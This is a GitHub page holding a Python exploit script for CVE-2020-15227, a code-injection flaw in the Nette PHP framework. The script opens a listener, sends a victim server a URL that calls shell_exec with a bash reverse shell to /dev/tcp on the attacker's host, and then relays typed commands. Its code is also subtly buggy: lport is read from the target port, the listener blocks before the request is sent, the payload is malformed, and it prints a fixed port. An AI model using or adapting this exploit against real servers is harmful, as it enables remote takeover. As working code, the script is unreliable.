-
Notifications
You must be signed in to change notification settings - Fork 5
/
exploit-CVE-2020-15227.py
62 lines (47 loc) · 2.19 KB
/
exploit-CVE-2020-15227.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/python
# author: @fr0z3nsp4z3
#
# Packages nette/application versions prior to 2.2.10, 2.3.14, 2.4.16, 3.0.6
# and nette/nette versions prior to 2.0.19 and 2.1.13 are vulnerable to an
# code injection attack by passing specially formed parameters to URL that may possibly leading to RCE.
#
# Reported by Cyku Hong from DEVCORE (https://devco.re)
#
# Impact
# Code injection, possible remote code execution.
#
# Patches
# Fixed in nette/application 2.2.10, 2.3.14, 2.4.16, 3.0.6 and nette/nette 2.0.19 and 2.1.13
import sys
import socket
from urllib import request
import argparse
import pyfiglet
print(pyfiglet.figlet_format('EXPLOITED BY'))
print(pyfiglet.figlet_format('FR0Z3NSP4Z3'))
parser = argparse.ArgumentParser(description='CVE-2020-15227 exploit by fr0z3nsp4z3')
parser.add_argument('url', metavar='url', nargs='+', help='Victim web URL formated as http|s://domain.com')
parser.add_argument('port', metavar='port', nargs='+', help='Victim web service port')
parser.add_argument('lhost', metavar='lhost', nargs='+', help='Attacker box IP|domain')
parser.add_argument('lport', metavar='lport', nargs='+', help='Attacker box port')
sys.argv = parser.parse_args()
url = sys.argv.url[0]
port = sys.argv.port[0]
lhost = sys.argv.lhost[0]
lport = sys.argv.port[0]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # start a socket object 's'
s.bind((lhost, lport)) # define the kali IP and the listening port
s.listen(1) # define the backlog size, since we are expecting a single connection from a single
# target we will listen to one connection
print('[+] Listening for incoming TCP connection on port 9999')
conn, addr = s.accept()
r = request.urlopen(url+':'+port+'/nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1')
print('[+] We got a connection from: ', addr)
while True:
command = input() # Get user input and store it in command variable
if 'exit' in command: # If we got terminate command, inform the client and close the connect and break the loop
conn.close()
break
else:
conn.send(bytes(command)) # Otherwise we will send the command to the target
print(conn.recv(1024)) # and print the result that we got back